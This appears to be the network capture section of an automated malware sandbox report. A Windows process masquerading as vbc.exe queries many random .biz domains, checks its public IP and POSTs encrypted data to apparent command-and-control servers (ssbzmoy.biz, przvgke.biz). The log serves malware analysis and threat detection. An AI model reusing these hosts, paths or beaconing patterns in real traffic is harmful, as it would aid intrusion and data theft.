                                                                                                                                                                    Nov 28, 2024 22:46:42.662859917 CET5994553192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:43.676070929 CET5994553192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:44.691634893 CET5994553192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:45.939476013 CET53599451.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:45.939491034 CET53599451.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:45.939502001 CET53599451.1.1.1192.168.2.7

                                                                                                                                                                    DNS Queries

                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                    Nov 28, 2024 22:44:16.594652891 CET192.168.2.71.1.1.10xc0ffStandard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:26.092693090 CET192.168.2.71.1.1.10x6c41Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:26.239912033 CET192.168.2.71.1.1.10x3e6dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:27.167702913 CET192.168.2.71.1.1.10x6c41Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:28.203473091 CET192.168.2.71.1.1.10x6c41Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:28.516356945 CET192.168.2.71.1.1.10x3d98Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:30.199661016 CET192.168.2.71.1.1.10x6c41Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:32.236419916 CET192.168.2.71.1.1.10x5acStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:33.238420963 CET192.168.2.71.1.1.10x5acStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:34.268866062 CET192.168.2.71.1.1.10x5acStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:36.973294973 CET192.168.2.71.1.1.10x6197Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:37.989429951 CET192.168.2.71.1.1.10x6197Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:39.004811049 CET192.168.2.71.1.1.10x6197Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:41.022582054 CET192.168.2.71.1.1.10x6197Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:43.178198099 CET192.168.2.71.1.1.10x9c1eStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:44.194097996 CET192.168.2.71.1.1.10x9c1eStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:45.193293095 CET192.168.2.71.1.1.10x9c1eStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:47.206796885 CET192.168.2.71.1.1.10x9c1eStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:49.363971949 CET192.168.2.71.1.1.10xf9daStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:52.608321905 CET192.168.2.71.1.1.10xa3f8Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:52.841706038 CET192.168.2.71.1.1.10x9681Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:53.832880974 CET192.168.2.71.1.1.10x9681Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:54.848702908 CET192.168.2.71.1.1.10x9681Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:56.874648094 CET192.168.2.71.1.1.10x9681Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:59.084439039 CET192.168.2.71.1.1.10x52adStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:59.315699100 CET192.168.2.71.1.1.10x5306Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:59.542212963 CET192.168.2.71.1.1.10xe90eStandard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:45:26.679733992 CET192.168.2.71.1.1.10x9acaStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:45:44.750461102 CET192.168.2.71.1.1.10x7f52Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:11.740989923 CET192.168.2.71.1.1.10x89d0Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:12.738260031 CET192.168.2.71.1.1.10x89d0Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:13.754035950 CET192.168.2.71.1.1.10x89d0Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:16.907283068 CET192.168.2.71.1.1.10xfc25Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:17.910101891 CET192.168.2.71.1.1.10xfc25Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:18.925837040 CET192.168.2.71.1.1.10xfc25Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:20.925868034 CET192.168.2.71.1.1.10xfc25Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:23.140904903 CET192.168.2.71.1.1.10x8daeStandard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:24.145323992 CET192.168.2.71.1.1.10x8daeStandard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:25.162677050 CET192.168.2.71.1.1.10x8daeStandard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:27.160124063 CET192.168.2.71.1.1.10x8daeStandard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:29.038467884 CET192.168.2.71.1.1.10xeb08Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:42.662859917 CET192.168.2.71.1.1.10xe057Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:43.676070929 CET192.168.2.71.1.1.10xe057Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:44.691634893 CET192.168.2.71.1.1.10xe057Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false

                                                                                                                                                                    DNS Answers

                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                    Nov 28, 2024 22:44:16.732482910 CET1.1.1.1192.168.2.70xc0ffNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:20.122911930 CET1.1.1.1192.168.2.70xa9d6No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:20.122911930 CET1.1.1.1192.168.2.70xa9d6No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:26.380198002 CET1.1.1.1192.168.2.70x3e6dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:26.380198002 CET1.1.1.1192.168.2.70x3e6dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:26.380198002 CET1.1.1.1192.168.2.70x3e6dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:26.380198002 CET1.1.1.1192.168.2.70x3e6dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:26.380198002 CET1.1.1.1192.168.2.70x3e6dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:26.380198002 CET1.1.1.1192.168.2.70x3e6dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:28.654900074 CET1.1.1.1192.168.2.70x3d98No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:28.654900074 CET1.1.1.1192.168.2.70x3d98No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:32.234941959 CET1.1.1.1192.168.2.70x6c41Server failure (2)pywolwnvd.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:32.234981060 CET1.1.1.1192.168.2.70x6c41Server failure (2)pywolwnvd.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:32.235016108 CET1.1.1.1192.168.2.70x6c41Server failure (2)pywolwnvd.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:32.235052109 CET1.1.1.1192.168.2.70x6c41Server failure (2)pywolwnvd.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:34.579782963 CET1.1.1.1192.168.2.70x5acNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:34.579807997 CET1.1.1.1192.168.2.70x5acNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:34.579933882 CET1.1.1.1192.168.2.70x5acNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:43.167146921 CET1.1.1.1192.168.2.70x6197Server failure (2)cvgrf.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:43.167159081 CET1.1.1.1192.168.2.70x6197Server failure (2)cvgrf.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:43.167171001 CET1.1.1.1192.168.2.70x6197Server failure (2)cvgrf.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:43.167433977 CET1.1.1.1192.168.2.70x6197Server failure (2)cvgrf.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:49.362823963 CET1.1.1.1192.168.2.70x9c1eServer failure (2)npukfztj.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:49.362843037 CET1.1.1.1192.168.2.70x9c1eServer failure (2)npukfztj.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:49.362859964 CET1.1.1.1192.168.2.70x9c1eServer failure (2)npukfztj.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:49.363116980 CET1.1.1.1192.168.2.70x9c1eServer failure (2)npukfztj.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:49.863692999 CET1.1.1.1192.168.2.70xf9daNo error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:49.863692999 CET1.1.1.1192.168.2.70xf9daNo error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:52.840854883 CET1.1.1.1192.168.2.70xa3f8Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:59.083451986 CET1.1.1.1192.168.2.70x9681Server failure (2)knjghuig.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:59.083472967 CET1.1.1.1192.168.2.70x9681Server failure (2)knjghuig.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:59.083482981 CET1.1.1.1192.168.2.70x9681Server failure (2)knjghuig.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:59.083524942 CET1.1.1.1192.168.2.70x9681Server failure (2)knjghuig.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:59.314755917 CET1.1.1.1192.168.2.70x52adName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:44:59.540350914 CET1.1.1.1192.168.2.70x5306Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:45:00.506107092 CET1.1.1.1192.168.2.70xe90eNo error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:45:27.583204985 CET1.1.1.1192.168.2.70x9acaNo error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:45:44.888593912 CET1.1.1.1192.168.2.70x7f52No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:14.648359060 CET1.1.1.1192.168.2.70x89d0No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:14.648423910 CET1.1.1.1192.168.2.70x89d0No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:14.648435116 CET1.1.1.1192.168.2.70x89d0No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:23.140171051 CET1.1.1.1192.168.2.70xfc25Server failure (2)ifsaia.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:23.140188932 CET1.1.1.1192.168.2.70xfc25Server failure (2)ifsaia.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:23.140202045 CET1.1.1.1192.168.2.70xfc25Server failure (2)ifsaia.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:23.140209913 CET1.1.1.1192.168.2.70xfc25Server failure (2)ifsaia.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:28.047879934 CET1.1.1.1192.168.2.70x8daeServer failure (2)saytjshyf.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:28.047894955 CET1.1.1.1192.168.2.70x8daeServer failure (2)saytjshyf.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:28.047904015 CET1.1.1.1192.168.2.70x8daeServer failure (2)saytjshyf.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:28.047982931 CET1.1.1.1192.168.2.70x8daeServer failure (2)saytjshyf.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:29.175770044 CET1.1.1.1192.168.2.70xeb08No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:45.939476013 CET1.1.1.1192.168.2.70xe057No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:45.939491034 CET1.1.1.1192.168.2.70xe057No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                    Nov 28, 2024 22:46:45.939502001 CET1.1.1.1192.168.2.70xe057No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false

                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                    • reallyfreegeoip.org
                                                                                                                                                                    • checkip.dyndns.org
                                                                                                                                                                    • ssbzmoy.biz
                                                                                                                                                                    • przvgke.biz
                                                                                                                                                                    • lpuegx.biz
                                                                                                                                                                    • vjaxhpbji.biz
                                                                                                                                                                    • xlfhhhm.biz

                                                                                                                                                                    HTTP Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.749718132.226.247.73807796C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 28, 2024 22:44:26.660605907 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Nov 28, 2024 22:44:27.994559050 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 28 Nov 2024 21:44:27 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: f22ba38775d019294b100fe78ff83aaa
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                                                                    Nov 28, 2024 22:44:28.036232948 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Nov 28, 2024 22:44:28.461354971 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 28 Nov 2024 21:44:28 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: c7d2cfcb60918463fc9e299f8d935cc4
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.74974018.141.10.107807796C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 28, 2024 22:44:34.926409960 CET344OUTPOST /j HTTP/1.1
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Host: ssbzmoy.biz
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                    Nov 28, 2024 22:44:34.926440954 CET834OUTData Raw: bb 51 5c c3 2c 86 67 ed 36 03 00 00 2a 05 e2 93 84 df 63 8b 47 8f 51 9d 77 e9 a2 2f 73 99 db 64 c8 20 17 7a d6 f2 f4 9e c1 ea 36 c2 8f 87 4f 3f e9 12 b7 5d db 28 87 4d 18 ba ff 52 6d 0c 21 47 39 40 ea 09 d0 86 76 7f 03 a3 cf a3 a5 f3 63 3c de ac
                                                                                                                                                                    Data Ascii: Q\,g6*cGQw/sd z6O?](MRm!G9@vc<AlITCQYSXKz\1a_Kr2zr1BaTmeK8{I}d_dO8.ZZ~DV%L%Fp91w;5CTEIS6A@j
                                                                                                                                                                    Nov 28, 2024 22:44:36.970561028 CET411INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Thu, 28 Nov 2024 21:44:36 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: btst=9304305ae0ce9b2e67a6c7add67f1096|8.46.123.228|1732830276|1732830276|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.74974318.141.10.107807880C:\Windows\System32\alg.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 28, 2024 22:44:35.051719904 CET344OUTPOST /j HTTP/1.1
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Host: ssbzmoy.biz
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                    Nov 28, 2024 22:44:35.056476116 CET778OUTData Raw: 53 90 19 6d 96 df 27 98 fe 02 00 00 51 09 7b a3 8e 11 d0 d0 9e 80 7a ea 51 83 38 17 a0 85 9f a0 c4 80 ec 96 8e 89 63 a1 d7 b3 64 ed f9 c2 8f a8 7b 99 c1 d3 e5 e1 6b c9 06 39 61 22 70 4a 6d d0 0d 6a b2 e0 cd 11 fd de f6 ba 22 5b 73 7e ab 9b 6a 84
                                                                                                                                                                    Data Ascii: Sm'Q{zQ8cd{k9a"pJmj"[s~jiQ5GS%]os\;n!4]V AE^F@3NuZM6oF,$:#aH6T]EP*)3%=p]UB?
                                                                                                                                                                    Nov 28, 2024 22:44:37.530086994 CET411INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Thu, 28 Nov 2024 21:44:37 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: btst=c4ce88473a89f48c79dd2dfd384fc4de|8.46.123.228|1732830277|1732830277|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    3192.168.2.749754132.226.247.73803628C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 28, 2024 22:44:39.638662100 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Nov 28, 2024 22:44:40.988693953 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 28 Nov 2024 21:44:40 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 1ae923c5559e27e9c9d287a34a194344
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                                                                    Nov 28, 2024 22:44:41.089533091 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Nov 28, 2024 22:44:41.524159908 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 28 Nov 2024 21:44:41 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 767e57fcd14ec5601852c7e5d3c1341c
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    4192.168.2.749780172.234.222.138807796C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Nov 28, 2024 22:44:50.009222031 CET354OUTPOST /hndiufmakse HTTP/1.1
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Host: przvgke.biz
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                    Content-Length: 834
